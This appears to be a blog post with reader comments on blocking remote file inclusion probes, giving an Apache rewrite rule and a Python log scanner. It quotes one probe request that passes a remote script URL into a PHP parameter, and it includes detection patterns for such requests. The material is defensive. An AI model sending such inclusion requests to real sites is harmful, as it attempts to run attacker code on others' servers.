Just in case

If you’re seeing a lot of requests like these in your logs

http://whocares.de/category/misc//war.php?
    vwar_root=http://smolen.org/test.txt??

this might come in handy:

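# Send unwanted query strings elsewhere
# (needs mod_rewrite; "RewriteEngine On" must already be set)
# Match a query string that contains a remote URL ending in "??"
RewriteCond   %{QUERY_STRING} http:\/\/.*\?\?
# Redirect; the trailing "?" drops the original query string
RewriteRule   ^.*$   http://www.turnofftheinternet.com/?     [L]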

Add, adapt and change to your needs ;)
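
To see who is sending these requests before (or after) adding the rule, the same pattern can be run over the access log. This is an added example, not part of the original post: the log lines are constructed (the first reuses the request shown above), the function names are made up for illustration, and it goes slightly beyond the RewriteCond by also matching https:// and percent-encoded values.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Same idea as the RewriteCond: a remote URL in a parameter value ending in "??".
REMOTE_INCLUDE = re.compile(r"https?://.*\?\?", re.I)
# Client address and request target of a common/combined log format line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2008:10:00:00 +0100] "GET /category/misc//war.php?vwar_root=http://smolen.org/test.txt?? HTTP/1.1" 404 210
192.0.2.10 - - [01/Jan/2008:10:00:02 +0100] "GET /index.php?page=http%3A%2F%2Fexample.org%2Fx.txt%3F%3F HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2008:10:01:00 +0100] "GET /search?q=http://example.com/docs?a=1 HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2008:10:02:00 +0100] "GET /category/misc/ HTTP/1.1" 200 7300
'''


def find_probes(log_text):
    """Return (client, path, parameter, remote_url) for each matching request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes each value, so encoded URLs are seen too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_INCLUDE.search(value):
                hits.append((client, path, name, value))
    return hits


def probes_per_client(log_text):
    """Count matching requests per client address."""
    return Counter(hit[0] for hit in find_probes(log_text))


if __name__ == "__main__":
    for client, path, name, url in find_probes(SAMPLE_LOG):
        print(f"{client} {path} {name}={url}")
    print(probes_per_client(SAMPLE_LOG).most_common())
```

The third sample line carries an ordinary URL with a single "?" in a search parameter and is not reported; only values ending the remote URL in "??" are.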

3 thoughts on “Just in case”

  1. Pilot

    I usually try to find out what the referenced “text file” = php script wants to do and if the owner of the webspace it is placed on is supposed to know about it being there.

    In most cases the owner of the web space is thankful for pointing him to this file (and usually some other hole in his web space).

    Regards,
    Ingo

  2. Stefan Rubner Post author

    Actually, that’s what I normally do. However, as opposed to your findings, I have made the experience that
    * the response is nil, not even a “thank you”
    * as a singular action the offending files are removed
    * the security hole that allowed placement of these files in the first place isn’t closed
    So just some days later the very same sites will show up in my logs again with just the remote file name having changed.
    Which of course doesn’t keep me from writing yet another mail to the webmaster.

  3. Pingback: security
